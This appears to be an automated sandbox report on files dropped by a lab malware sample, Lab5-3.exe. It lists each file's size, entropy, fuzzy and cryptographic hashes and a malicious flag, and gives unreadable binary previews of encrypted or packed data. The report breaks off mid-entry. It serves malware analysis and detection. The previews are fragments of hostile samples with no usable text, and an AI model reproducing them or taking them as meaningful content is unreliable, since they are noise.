                                                                                                          Preview:uV."%U.\...s.!%........0....._)>...\.......;.>...U.....p.S(.@NZ.K.......1..J...._...S"Wl...0F.."#0rj...m...3..a.......p.p..e.I.:v.gS.7N...7...&....n.<F.3.w.k..8.!...........E.:..<.C.............fw.w...S..JT..z.....%O.....S...bC[x.q.3.D....._n.t..aw.f..i.'..p......M8*..>i......b..EN.1.[.J.9....}?..,.I..=....:n..O3S.4:g....F.....I....O]...b..+poT.....m..e.4..k.>.! zI]F..\.....5CYb...00..t.W...3...]..{.ehwoQD.;....\%...\.....A7..$.) *.\.......P6..|.g.A.Z....Q..yR)#...M.T>.&-.S. ...C.MXaBHS..k.......S.g'..E..y...ZlAa.....D...h0&qc...%...jw+.......0..(zL.r+#.._(..n..nbD..:F..@..2.t..!lV....f.F..........P#Y.~fX......xG#.o....5S.......{A.....jo9b..7[>&.............a.....C\..sZ..3....52+[..47.'.....~+.qq.k]w......K:.6.V...0..;R.i.G......}~.};....=...~.t.S7*.JP.-...m.....y...M....FAoU].0).]..K}.-_...t........L..s:n...4G.....S.TV......'.S....b......Gj.;....Y..{..~....F...wC^......f1_.&.'*..X{Y..C......~.bS..Q...6..M6.7._....?....g....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23136
                                                                                                          Entropy (8bit):7.9914466568936575
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:aWHJhJZuXL7LTb8YmgVVQrsDG98a2fbuDHH+p44IXuVasvEna4tb:aWaLTkVsDM8a2fSr9V4eZ
                                                                                                          MD5:4B257E78CF2890ECE0C29CCE9317DFF5
                                                                                                          SHA1:47EAE4E7C6E463C19BA3289706C930274ABC1664
                                                                                                          SHA-256:0D6B9B7A0FAED221007A5CD8D2F4C204FFC482B238D0641D00473910E8081750
                                                                                                          SHA-512:CC88E306E030607E64662E066330809C7598A2941DAB84D51BA9E05A243EC4572C54B9119C041163C17EA17BB5CA46CF4ECE574307EA49226FB7E267EE162D59
                                                                                                          Malicious:true
                                                                                                          Preview:.0i.WnL...9.:.........Y....+.D"...TQ.|.......t..C-...K...../i$....E....{.......Q.-..b.x.-....I......Q2.n.<.%.c....C...pd`h.6D..m..../m=......C.H]...'.J..L.!.1i..6...j..1.. ..vt.........P.bE..I..O.k...O\.....`..-.....W.......z\.c.6.q......]$W$...E.....o8........e..........J.Q..Z..\.v..`.Y.S..y....f6.. D@].....'..g.........q..uX...\...Xl...q@.&.......Uk@.A~..\/1.*..rj.z+..wB.....`..S2P....$.g....JS.m.).E..+..!..?....a.Z....=`.R...o!..R*T+....]...?n...I....?o/.{..y<Ww..$...~......0.F_\H.ee.b.p0.N:-A......c.C1S..-}...X'l.P.GH..V..?.2.Z....\~../.....F..;.9"..I3...2BG._..6.....`..".$...p..!&...b.w....'SzA\.$][...q.g........q........K.Je`""..#.v.:......_.-.Da.............8<p..-(...a..........7Y.....rb...?o...o.)4.3.Y....T6..8.#.E[..TF3.6....y.X.(..uA.^.{....Q.+........wC.T$.F..o.Fs..s!1I.9.'.?.G..Ub.../...E....4.M..e1..8...w.R.Vq....f.8..?.;d%..bdw..L..-"..yQU..L+.M.h....^.....".P.$./:.4..........2...<.G"..bF...T.{..d...f...^m.....`.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12352
                                                                                                          Entropy (8bit):7.984972087670558
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:x2HFo2lVtFZe86Cu/FEcsNrQdEM1zQXn0msnHyeFcGv6mdj0Cb:8PlbK0utcFQWM1830msH+e6mdjtb
                                                                                                          MD5:264344A0B80893FFA67EEABAFF4B30B0
                                                                                                          SHA1:11BE4D889D3336E61EDB92C067FA7B48700AAD0E
                                                                                                          SHA-256:9799E81837C6B83D1D5A15539B519DB8E0AD6492D7B3DA537889056CBEC012CD
                                                                                                          SHA-512:5AEDF7A2181383824D9B9DF94571190B911F324F895DE1B2AD6F6D4475A27C33CC1170C31BBD27F5B156696D092D37FD03546813B90F0A691368FBF511BDA033
                                                                                                          Malicious:false
                                                                                                          Preview:..s.1....p.*.........#.b.7.".u).z!s...;*}......_Ea..".....>g.3...-......00.C]Q.[;.c.i.I4.D..%. .u.:....g..er.1A.H....8....\2fLe.,G.i..rn|*-.~.L....*t.i......u%._.0;.*h,9.e. .;.<L..M.R.aqF.3i.{2y\_/....;..2"~G..f........68...b...B#.m+B..E....).o...a.R.n./......<.i..a......b...%4\ .n.%...a...n.F.n......m....F..X>.n....y..D.9.uT....b.K.S/p..................;(.h...S...N.r..Db...b%.k...-,g.E..S4.1.I.g..[rjc..........W.`7.........3k.s..".jK!...NI..v2JE(..l......P....#.....Oq;K.....R.-..]v.m...gx"..C......|)?.sV]....a..G...W6...FbN..7'.dq~.i. .<......o.CW.1.e.Ow.|H*.pb..D.?.-,.+..pcZ...".I.......u....g..R.K.T%..-..A.L.V.c..>.QZ.=.8....gv.p./.N.}.3.X._..i\.o.R.......@.4..<.|A!.X!(.6.....tJ.a.M..E8$/...1..+...b......Y.4e.'~.B+P..a+C..N.....0.....&..._.E.....8...%.#..8..^.ql...X.......:@.....b..2..Z.W...uU.?k.....6.z,}.....$..6....U?~H..........]6=.?|l.\.*.......Su..&}rigeW.....+..}5.2o.z...n)D...9O.E.6....._.S.=..|.PDE..mY@c>..<.{Uu.....$...*.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6752
                                                                                                          Entropy (8bit):7.970970256372976
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:f1b7HMMcHgwvH01ufJrsOTr0en2xfepLXCHvU0Cb:f5Ml/ZfJoAH2xfeW8tb
                                                                                                          MD5:663135D95F9664120A3F0AD31A3EA614
                                                                                                          SHA1:DFA8D276BA1418151984F6000793C16A5BB0CC2C
                                                                                                          SHA-256:A029DB1E7EC8044F68D842B6589BFCF95884CB29C2D954AFB59CDEDBA9F2F886
                                                                                                          SHA-512:7E538BEA6EEB9B7638AE12D32C5B2D117AF75A20C9D1107BEC2D0AA99F6473B4868F88950479B265969875FC2FB9C506659409EE220423F1C27C5488B49158BB
                                                                                                          Malicious:false
                                                                                                          Preview:t...&..n.>.8.I.1c./..n'.?e#..D........[....5l....@&2.o3.&.......$;...6...-.}2.........%f..L.N..\.E......p.[+...Y..&.V..Bv(....j+.0..=....*aajU. ..........e.J..i..A."P.....#.U....|f..Uy.A....n<.q......J.)...i...&...40.TU.v.9y.f...>i........!...D.diO..598CD..7.M.\..1F....B.zu,.w...Jc.._..6>....-f!.o...F..m.gMpP.2L`..a-....,...l...O...rD..&.7..,......w.Gr..=.G".(.^$.tx.U...[w..../l..#..6v...`.G......-Q~...rM2.....u.#.Q.!%......n.>..k..n~....m..8A!q.:L.......\a...eC..&M.f.-..?..`(.,..Bisn..)=..s.8../!|.7.#.[...i.v.-..Y.5..QU..,.l....)#x*.8^..`@;......:..|5...3...>t.&....}...........U..(eI...X%.....Q|E...=kO.B..6..z.<.?q.../.I'IN......w..s....b..1..........x..#>r........{@...k.g..W......8.f...`/..L.Qc0.D4..#..8.1......=..D?t...[C]]..q..8.....Z(x.\... ..W..k.;J....>..Ek~)\(..E...-..<^".....n0`.Cb...(N)..F..}....'.k.....).a..P..}.~P...Y.0..%..g9...[Ar!....>..Q.....C.......g}.p......LJo_.....}..........^~e.@.>.CT.C..G...vQ.._...)...h.N>.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7616
                                                                                                          Entropy (8bit):7.973088159296099
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:yh42Rpf7JQXcucD3PQvoHjJHYu2d3s36O8c+rRm0Cb:yXl+DcD3nYXd3sKbdQtb
                                                                                                          MD5:6232E8A3B831A795937545BEBB94CDB2
                                                                                                          SHA1:8CC774E2BA0B85A5B8ECCEC46600EE1286395F34
                                                                                                          SHA-256:BD9B79D0AE0083E96A2FD1C22586F5A3F87F0AD8AE2D80DA05D9129E430C58AA
                                                                                                          SHA-512:12BFB26F3084A4F7222138DDD92B03079BB02E82A13147DBE12FD2353E30BCE26D960AE78A3FACF1271DFBFDEB2FFEF762B238641469AD0389DA30061CCE911E
                                                                                                          Malicious:false
                                                                                                          Preview:...M.;.RU.UvQ.=c..4.*.j6..":V.....1l.9........\.....D...9.....N...X.0..4.....5.V6...C..|.X..0.>T..K].;$7..._...P.D{...C...D[5...g"z/.lEH.%..X.j].A...QEF......f.Q....>....\.d3.......|5`.......r+ga.z.>..z. ..-..p^c.V.....m..ze.Q....@./..!E...l..9.....5...c.GfD.p.....R.;8q0UIe.@8\.e...3....-.|......U..\C.........j4qw.I.yy|...F|6.hK....1...,M...2.v-b........q.|..j...]..I~=..H...d....:-.h...p).t...#.o..O...D..'.r..t....91A..J.i......O..}...l.....B.......-1....4..j.......(."O'.,c..!...u.[.h.3$,K9^.E....?.d+h.............. /.....9.+..+Jm.s.v..&..TOC.7.@I.e..2J..H.7X.....:-3...}..R..ahn.).....5.M6......!r(+...D} .'.p.>m..{.5T0.+...4,.......S.pq."b.Y.-z.M<.._...c..y<.;.....:.S../.-&.,o_L..e.2.f%9.f..6.P...R.b:s..w...1@.d.|......Y.|FM.CW....?yD..A[....7.....F7.....Q/...)TWa.L..[?(...s8.r$.T.l.$.....+8..L9.#?srq....v.FP......*.........zk....n.w1..P.f..!6ud..Dy._N...V~.L...M.=..1soK~FW+E......]lORf......"+...{.P..LS....R..T..G..^.A.G...t..j.'}...I..:..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15008
                                                                                                          Entropy (8bit):7.987942960909727
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:CSoA9Coov5OoAJ6M300aRajALzrL8aVQm3Etb:BCEl0lMjAbL8ax3EZ
                                                                                                          MD5:D23A307B23D0C7D1F2B5EA5495D46AFD
                                                                                                          SHA1:37612511866F2E54A903CA834D318E9B90038B92
                                                                                                          SHA-256:2A2C6F1154BB3E235007C27DCE740A74DF62A77300C96BAE0BCCAC97C3765278
                                                                                                          SHA-512:CB56B5781BB423292BE186F1F6AB1D5BD7E65D7DB06CEC3BF931DFD8E8A842193C551909FB6D77EC6E91A6C6B285DC2293D18632F2898DF2679C11234FA944CB
                                                                                                          Malicious:false
                                                                                                          Preview:...9.S..z.J!.]..R.F7M5..'.l..;.....k.<P..EF.V...E.s.fL.."{o....y.QM.c.....~.I"..e..H..R@....te....A..j.$...S.6;...<...)i..P.\{'....*.zL..:D...i.........._.......W."[8`Q/%_.....{.F.\BS...z....H...v.8......M.^..V.....c.c.&.2.&aP.g.N..r..w.....J..\.M...+..l[.|..+...L.....)B.......$-....b<.........Z.i..g...c..1s.O..3..E...U.D...~9-.X.#......)........:.....@...C.}...xO&M.i..M../'~.......y.\a....6Q...,.-.....`.I.L~..I.x.........b....L....<...t.K+d.v.tG...z.{...sq@v...8..T...P.`o.....n....[a..j.o......)s.{....). A#(.$C..'.5.....yHN.%..-4.N.(.6..qK............@.x.t..y,...4...."........m.{ob..f....m..O..._.yjd_xb23....%K..-Ll[29_.,.......[.R....,..`.N..x<....x...p;...;......z.&q.b+|.d.........FOH...~......y..0.c....?3.$_..:t......+.i=.......k....<......2myW.GIRt..kyG.v....2.....c*..........+$U....0..xG.u.up.4Oe...M.E.... .e^Q.\(...k...S.A.....H....f.om.&..Q.....O..S.s.P....d.b.....2y.....a.B.].(0 .3..5*'N8.@.y..;}e4I..\%....../.....B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11488
                                                                                                          Entropy (8bit):7.983052736606126
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:WvJQn1xHoajaJClDuy/nG3TwAdCk+vs+w2utdERcfc4Fb1kQvk0gI0Cb:WvGn1xIgX/n8Ks+wVUcfc4FLHtb
                                                                                                          MD5:443EDA4260E7BD805782E27F400A5869
                                                                                                          SHA1:B4DF5FAF0F704D18E7800E9FC2E349FB6A6339D0
                                                                                                          SHA-256:182CDFD1F4C14C22B82518FDB0D39917C19705743F064D40B2F3860BFD597A8E
                                                                                                          SHA-512:745A1533E83047F4DD188653AFF0FC54CDADD9FB269E23913551970511FF0A9F35B8E21B4FBABABBC051B365A4224828339BB0D282A63283064FC004BFF04C00
                                                                                                          Malicious:false
                                                                                                          Preview:...t..PPC`l.......gu%.|.g......Z..r...i.[T2..%.L.i.....$...*^....$.....U7.j../ .D._t..`..g........F..B...yg.b.v;....R.W.?/3~"..{.P.eO.,p.E..T1..Zs.V..b..>.5..Q..v.zP...>...'....0:...&W.,.t.c...a.0..mO._....Q{.G..40.N....t.>LV.*.c........zs...XEY..iv.rY...2...R..Z?2.U^B<..F....w....".........f+.q '(..F.$..N..+...^O...e.q.Y...$..O2f.....s#@.........]..$>.{..|..<."..n.....UC<...K..b....W<?.2P].U...G.x,.z0. ...BS..4..Q.E.d....`uP.Ro...".....t.'.3.U{...-R^b7.u5..s...CF.`.....gp..7`.R.!.<..}(.]{..)......e..d,.9..P.bzo.&.lZ.B.+.[.!..Kf^..k..yE...~...v(.....^....Z.xvv.&..<L?....i.h}.....l....&B|.&.y.B.R...y.w/-.=d5VK.E.n..B..D.>M-L.....}..;D..J*......Z5...........y...I._.5..C..0.A..I.6....S..s0D.......X......#..8^2. [.w@=.H.{..W..D.....AM.......1.._...Re....:.N...\..C.v{.j.{.S.t..`SQ...?^k....E..Tz%.>mu+&Q..g.$J.....~...]1.n|...'.....h$..x.X.!d.D..(....9O......Y........."..9.\.D..po\.....>8.._./l.<Mw..*..DM.$...n.....%..<.......2>G..q...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11456
                                                                                                          Entropy (8bit):7.985029343506695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ilg960vet9JTjB9Mwn/16QjreyV0ZROKRtm8L7nP4vrGZqu4IO0Cb:0gE0veVjByw/16QjrP8/5ccOtb
                                                                                                          MD5:8F251B577DCC7FF9971BCBF9D3B5FD66
                                                                                                          SHA1:592F8188BD93F61D98A469C743EAC16B867D79D7
                                                                                                          SHA-256:605B41847CFBAA99EE49B842D48B1144D22E6EF900EE3BB28B02AE32539CBB2A
                                                                                                          SHA-512:BE3C40CD373744B01AFBFE3F7CE6C1021BE193CB4301D6C62965A07ABD67CC3E949A8364DC5DB32E67CF293700AEE310AAD522E8BCE1A684427F632C94A2EBCE
                                                                                                          Malicious:false
                                                                                                          Preview:X....Ph..P."...'S..3..u..h...bO#.<.ZK^.!.P..(....i.V.~T...u.....u.......eqZ....@].]...c....>...y.8....a..9...g.i...?@>..KZoZv......<6. DAT.*.h..n.t....Y...2.*p....H.......h...p.P[7.....-......6n..p.$..)f.@>.|[..1..E...^._..P.~..X.-...)1n..dg...5k....3.t..."...~../v1..)).H..?:...S.....~...../..G.S.e..P..!B`...M6......K.......8'......:.{(.....2..<b......:......x.+Xa..8s.7j...<`...>...WS'..nWm......{.t..=Ks[..f?...P.).....'..7T..........]U{...f..Y....!.q7.Ux...4.em.$.R..?.>K\[....@.h.B...o...&.Y........I...m4.Q...e!K.....8-.hL0..Ab.O9.4P-Bq...$..%..[.B..o.<...%xS.5.;%U*Xl.4;5.....J.5H.zi...l.!...+r.n*.+../^..(o.....gY.f...oU..l..Z.z...Bt.%.WG...f0....../...............:....L..w^m..TA.#..7ZV......Z.S..K0s8.Q7.R.'0....M.0..yCX$|.....#..e..`pP0....%3*'T.a"m}.u.....[...s....6.S.t.`>....8.:.H.a^d..G.-....o...<!...!...n...9l...\......+.(|i..'......%. ^?...S....;..}...S!.B....DR.....Ui.?.....`...T{>.......-..W9.W,RV5......?(....M7..C.T.x....S..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16928
                                                                                                          Entropy (8bit):7.9898499315709595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:iM9mHWnCl4vSARHpjXba7zXFbZb2jI5zwWFdGr+yqdtb:iMU2SOMXFbZ95zpgr9QZ
                                                                                                          MD5:E7F222B4BC0B0B516685BAB2961EA769
                                                                                                          SHA1:9EACD1FA2CC084EDD231974E96D37A1D26B2E38F
                                                                                                          SHA-256:BA88AF825D5065D6212180795BBF8C02FF9325C29B49F17BF80EF00DE3881F74
                                                                                                          SHA-512:2BE5B5EFF94DA79595604CC44BC80CDE212F55AC4268E45609135C4AD58B48F1F916454AFDAC5424499C0898F3231B1ED9A8A660861BD16AEE211A55610B6F68
                                                                                                          Malicious:false
                                                                                                          Preview:%..od...@.e...w.C.....H. .Eo..i...!.=..}<..t~D.8g...A..[K&.....#3..~......RDp`.....-..E..%.n.}..k%.f....@.d......T.p.'..m..z.....o.8.S.^.?uSF....4.a...-VH..K.....5S.....B.."....z..y..".....H.l...B.^.].IS.....i....?..a8.M....e..(..&*.....B.Su..!j.....?.....D.[..N.......'..y...H}...0.N..V........U{..c.."...3...R..i.-.y#..S...h.rd...&U....P..|.. -Bx.3n..c.~.9..}.Ai9.{G..c.M...;lr.....}...U...;=y.zM...C..-.Z..ZH..Y...99.!.....*/..v!..@jg..m."....L....:,.C[w...-...{...U.l .<EG!R.>......b.)../_r.n.V.....m..bN...V#.8.{~g.DG>.4.\`.....&[[;.."...Y-...tt.................a.z .)...9P.`.....b.$..cV.x.&..DF.#-Y......YR.8#P....6.zu..z2..&..:...JD.......o. ....).Z.%..ux..2%....Y.3.`........I.l$. .s..*......m......|.......Y...~.D....@......._O..EJ.;..4...F.P<.9...sU.)..?.p..S..vy.~..g.../W.1T........&...9N.(...$,I..n...........VV...n.=.......*...W&&;.6.^.gC..y0..7.!..:..;b..........x..+...o..j..Vf..q....g.....u...>..b).h..m.<..Q.............m3d2
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20800
                                                                                                          Entropy (8bit):7.990904541716216
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:/DmKN1eABbY1nxAAVkZIKpylgwtdFHOSnpNHEVcTaIgT7XS2ZXtb:L72ABkxAMAIXcSnpFDTazTbfZ
                                                                                                          MD5:8EC5754108CA3B2A2D32B1FD459BAB03
                                                                                                          SHA1:BEA3F3449A82DDEC59E141F1615ACE22BE36FD85
                                                                                                          SHA-256:6AFF7650EC15D17D6E97CAD1A2F489A3641DE99775E027E959A41B5E607D815E
                                                                                                          SHA-512:904402DAB1C4B5E987A7D359495C351755B9F3C4CA6BC0A8B4F012234BA32DE0A5957332B570452A94C5AFA08D996639E02C1A7316EC55546B8A194BA2C58EFA
                                                                                                          Malicious:true
                                                                                                          Preview:.(...oQb.j.v...d..ZC_.'......1.../.?..DM.....i./,..6Ps.H..X...c..y/8.>_\|..`...s...^4.b{.e.E Q..3?.q../.....c.l.#s.I.l.......t.Ez.....<..+u.m.o{.. 4;....F3.GW...zo.>..@...K..A..V_..QG.....Ij...&..p ..^8.c~.......3..TqQ,.v.."u...s.~..Hu....I.9"..<1zU.44..I........3.....2.q.1.P.5.).'......b.}.8dj.}....[._...n.$*..f.3......nL.>....[..%....D}D.y.sC..b.g.W=......c.w.e6.S....{4..6}.?.....}O)#.'7.e.D...P.C..$i.y...!..+.).....+.zW.......D..R.&?.4)9.3...s.l..2......6.S.K....#>..M.7....u..x..{.J.:..^../_.}....~5.+b.&+3.3g.f[..D.....A0.............c0..d9J.Dz..u.Z.<.dhs.R.b...Z..|g.YJ'.D.\.Ww.....J.."....U.qn..XK1.]...].a...B......9..KU.]...{.l%...8p...6a8...u..l..c......)..h...4.?....&....[.B.6..g...2..]AG."u..py...jpe.`w... .l.x.....P.........D..rp..JR.o.<..~DZ.cX.[......2.v.e|]...S..I.Q......q.2.M.]`...3..2..qC..Q.W....M.8....R7.?.y1%d...+ga.....Q..5G..,T..?..[:..I..<.`.p...*.<.Y.6@S..V>d"*..?ph....w.4..i.I..qF...I.O.-.'....-U"5L._.g..^....#.g...].
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:TeX virtual font data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10928
                                                                                                          Entropy (8bit):7.982714684404892
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:WvcCvq0JrszeR0xxUAz/QoraS4iILo3U/Z/NHQ7Z27qMnFAqX0Cb:Wvxvqusz9Xz/Qo/z+bHooeUGqXtb
                                                                                                          MD5:491DCD0265731A5B1629E0AE821BB7BC
                                                                                                          SHA1:068B0AD482B86333D00B9741FDF71C0CA9F4D5BE
                                                                                                          SHA-256:C119D126787AB913F47AF4265C7EC7A61E0F6C0A9CAB44FEB4B1BC0AC3B4092C
                                                                                                          SHA-512:AABD14C9C2415A711653193C0582C37F75DC70AC940FB32B194BADEF4A35278A4FEEC6281278E7C24E7C3356EEDA36E2CBFC578F2FD8DEC90AAD154257796EDB
                                                                                                          Malicious:false
                                                                                                          Preview:.......t .....o|;.gn..C.?..pI.>.U...7..8...&'r...2....~.28..q.I.=...v...h....[.$1.2%.....R.w../.S...r/s.[..x..z.)[V..d.D./..f....*okO..c:..:....3..5..... .c.`.'.$..F\.......m......4c.M.k../....@.z..';zq....k....+4...Q...).<..W..DE.)1P..s...V.E..;...............&..."......y.c....\.L....H...-....|.X..L....d..N.........Urw1.... .g."..{Q.]....>..|Z...|t+...f..:$.I|....8..X. .;.nE..?..jU4....N.swF..../..4.Tb.8.6...O......\V.~.W.y@..Tu...=~\.t..;g...+.U..x8.a..^..:..x...?..4f.V.."...p...[....:...:..S'F..XV.'J.......z}.........@.a_..ov....LjSNn...t..-./.t|....%.....M.......~s.Q.j..i..#..n...}..+>..?.)4....-..xw...L.....=m..-.(.v..n..vA|m.`............@....W....O.z.(.....Wk.......<.o....7.u.P..c..{..GU.}IG.9<.)h.._.z.....eA...(....O;6....Fj..>...Q_.....F#....U.....?..s..j...a.W..k............M!.._.r.....2uu...R%.h^./....U.R..C).x .m&g.p.5I.S.7.z.55...c...bQ.J.\...M>..YY..L..r.w..,.....q..h..N2f.....w......p.pa_ig. .........- .np...1Po..;.c...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10480
                                                                                                          Entropy (8bit):7.982762058326439
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:nNzrr54AWiAip2/gRjVInMMFdbzVuCm4FBJIsbtDI9tK0Cb:VpxAs2/g9VIbgCrNxDIvKtb
                                                                                                          MD5:CA1B43425F0DD8178B3A718634044800
                                                                                                          SHA1:67B383CB38D3F54089AF03EDBFEF26B4962D6C12
                                                                                                          SHA-256:D81119FADC26E3D1199DBD0B4672A64EE475D6EF8EF9DE6934E97B9981732892
                                                                                                          SHA-512:BB0615EA935B5527E48B1E8278F9985A6C51D62E324DFA9B198DE273CD8D97E1359A89D99084066EB232EB99B1E1B030D9A573BCB4AAAC48FC4611426EF097E8
                                                                                                          Malicious:false
                                                                                                          Preview:.3TA....!.e..p$.......d..5...a.B./.. k...u.B=C...jw.......\T..(.......O...3..A...]y(~=4y~.v...AUy.l..-..rl.!........L...CnzHr{.,...<0..........Rjrh\O...+<.$.....5-.xJ.e..B.3Y......s..L[.X.y...s;N.y.Tc..(.d..@.O+A}(R2W..@k....L..........iO.s.O./.Cx+....fK_R.*....{.H~Pc.-C:.....e.*_A^%..N%/.p!b|$.......<.J3.40.......A...y./.........6......~.~".....H.<o$..m...1..)L..s...N....9o=.z.. .-'.7z.K .V.+q.%.....|...."D.......8..._a.wy.(..j...Y..]....=$..2.&.)....G.g.{....*...a...... ...3.i......O..U.:.2.u.....LqM..GJ..&[z...K.I.d>_.........}...FQ.z.%..E..Y..=...W'.&u..Y..Q..m...B.s.2[.o.(.T..y...<-qGn.3CzPe.9*..6.9E.$...M8...)..}z....D.u..M...g..G.......k.,f..8.!sb..i9D.X..+.).[.5..J!3..x.R'...>[......8....U.k5......6.v....S........0c.c..............T....QC...&.s..._U.&B57.{L]...YMm...`...0ib.@\...Cb...),IL...{l....|.......9....+;.8..p...K.<.4@..sx).`.Yy...`.Ol.7S..D..W.4p...*.E........Y...#...n&u.a.cF.............(+..^K.....Qy....k.Oh?.b)rh.. E.N1y.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7536
                                                                                                          Entropy (8bit):7.976781241530958
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Ao/vyYZixgTGlOyS0oDDJ3qLlDspxfDZIF0Cb:H/6YcxMG8WoXJaBGUtb
                                                                                                          MD5:97F32C256AA3F39C614FD958CB7BCB82
                                                                                                          SHA1:CC3E5AFCA5999494B6F4CDCDF31269ADF634B706
                                                                                                          SHA-256:586852DCE7E0310ABAF88D6F5E529189BF8FAFD3EA5C7BE58224A97D4E16292A
                                                                                                          SHA-512:51F8B8FD756B5AB65DDAAA84A1390C6D4409A877E341C9F41ABEA286E46BB0C3E1BA93CE8E815ED844076C11E1498B996ECC67FF5974DF1D81D9321E20B8958E
                                                                                                          Malicious:false
                                                                                                          Preview:..0~I.u.);D1...p.x:..~2(..8.A....<......Lq.M.B..l)Gp..,.?.?x=......&..a^..1..O.U.D..y....`.o...g....ce|.R"_d..8.1......,(...lW.!.....hl......7.....0.../.?......J.3.rw.8..W!.....a....t.v=.`..;pp..u'.\...u[#7R.a...}..8...Y...R...u.W.A6....v.....Y.X..a.....s......_..;(..9...j...1.N.YY...=...`.n...N..1..RP..Q.k;..6...q....hb........$.{Vp.f{...q.7....7b...G..R<I5(1.jXoq..k.q...I'...........{..m.O".7..4...I.K]XPh.c.B....`| 4$.Z.}Ef.]..x........M.....~70......#..Z`...4...N.O.(.N...1kE;W.G.ZZ*.L.uv...Zx.+.1.<...8.,k..b.*..x..Z.. &._d...0.....D.#+..c.P.| ..e...q ....C...........f...r.\I....Z....Z..x.$kz.2.....3..x.e....o...k.A.f..V8..E...........o`..V.\2..sC.*.....>C.~].......j._..F...k.(~T..K.q...P.... .O#.I.GJ..*ng.....W.A..|....R!.z..2....9h.<....<..B[.0C..H]8...mT.i..F..7..{s.n,.=Q........G.6aUDh.f0fC...ns..z@%NL6....W...R7....d.....E.f.,.4.I..S.......!`..w.X..X.eO.9..>p....[..r./d.l.X.+8:.X.@...y.<.....<e(..J.........}....?.z{...>....dH:WN.+L.\s
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13552
                                                                                                          Entropy (8bit):7.986275956944761
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:3a/05S9PoP0DjUywpO9XF4qYh88OghMc0Ctb:3GyS9rjBGeV0h88OgrPZ
                                                                                                          MD5:60D77431B0449CFA7E69D01F629B3CD2
                                                                                                          SHA1:6E7FE61E7450520BC4A03F64D6C3CDB41ACE84B3
                                                                                                          SHA-256:4DD33DF642814954BC2F6069B2ADD61D144CBDB7E0891DD068C7296A294A79E8
                                                                                                          SHA-512:7D12B6C3DF8140A282C6B0B2922496731525314799FC0081BA91AC9840AB3C046D65913AA5B071A38EB7F8ACD8C83D787613756820DFDB0DF1131F5F8AFC59A8
                                                                                                          Malicious:false
                                                                                                          Preview:.E.4.......Q`G;..m0.W......~Bz.L.U.Dx_...,.>O..)l.i.+.'.=&$....zr"..PBuH....q.{..DurL,.Dx..&.\...i.....G..?.m...E...*z..?u....ds(.../....%.2...L.12.=..4...>.......k.....{_..GQ...@.%m..@...7...|m..R!|....)....:...:.ZiE...s.BJh...I..............F...|.;!......kQz...b.P[....O.v.........f..$if....B...+..c.\.0.u2..A.7..6Uw.O..X.d..p.U...\`_....=Yf.n?5hzCh.1.|...g7b.p..{.t...P.Q.L..&C.5...`..}..WVn........J...]..D....Q...HR".1...x.R.:.G..y*Y.......vd....K.s.,..K.fiK5.......u_....L.mEf.M..n..)A..C...E.=P)............d..i...!3..z.....*M...._...l.e..{Y.f......%...=+.v..9JC2V!..P...@..a_.....VV./..+..nIk..q..71...0.=...R....aj*c.f2.nNI....t..4.l....Qz..)....P...~.....?.j_..R.l.t...=.|.^...l}...YW.d2q...7Z..".O.$.Z.a[`........}......E.V....&<y.....^...x...X7...}......T.1.`m..c../1`.hKM..V..a..@._=.{.u..Q.....]..(...:*....s...3K.Rn..?<...8...|..^....g...V...Dh.c.y;X../...,.rb........[P...?.1.n.L.F..U.~..p...{n..Q..?.xmp...t9}l..B..u....P1.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8736
                                                                                                          Entropy (8bit):7.9775991450321255
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:OSC7cwFnHYMfxB0vZUHoHPkieEFUgIwWWSWUgNC/eTdJZgD0Cb:9WVFnx0pPkiXFAXgU/8ZgDtb
                                                                                                          MD5:D5EF95E90C55FDA0DC648F2CF56312A5
                                                                                                          SHA1:E64B3FB38DCE63AFAB9B99B132F19F9746D529E4
                                                                                                          SHA-256:1B19DB40FFD177E9EF6D72A0AB8E2C03561F8EA389263D506829253930583378
